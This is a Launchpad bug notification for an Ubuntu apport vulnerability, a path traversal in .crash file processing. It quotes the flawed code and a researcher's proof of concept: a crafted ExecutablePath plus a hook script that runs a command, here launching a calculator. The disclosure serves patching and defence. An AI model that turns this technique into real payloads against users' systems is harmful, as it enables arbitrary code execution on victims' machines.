** Changed in: apport (Ubuntu Artful) Status: Confirmed => In Progress
** Changed in: apport (Ubuntu Artful) Assignee: (unassigned) => Brian Murray (brian-murray) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to apport in Ubuntu. https://bugs.launchpad.net/bugs/1700573 Title: Code execution through path traversal in .crash files processing Status in Apport: Fix Released Status in apport package in Ubuntu: In Progress Status in apport source package in Trusty: Fix Released Status in apport source package in Xenial: Fix Released Status in apport source package in Yakkety: Fix Released Status in apport source package in Zesty: Fix Released Status in apport source package in Artful: In Progress Bug description: The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file: opt_path = None if self.get('ExecutablePath', '').startswith(_opt_dir): opt_path = self.get('ExecutablePath', '') elif package: # check package contents try: for f in apport.packaging.get_files(package): if f.startswith(_opt_dir) and os.path.isfile(f): opt_path = f break except ValueError: # uninstalled package pass if opt_path: while len(opt_path) >= len(_opt_dir): hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks')) opt_path = os.path.dirname(opt_path) This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened: fwilhelm@box:~$ cat poc.crash ProblemType: Bug ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks Package: f fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py import os os.system("gnome-calculator") fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator [pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0 [pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0 The sub directory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used. Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues. To manage notifications about this bug go to: https://bugs.launchpad.net/apport/+bug/1700573/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp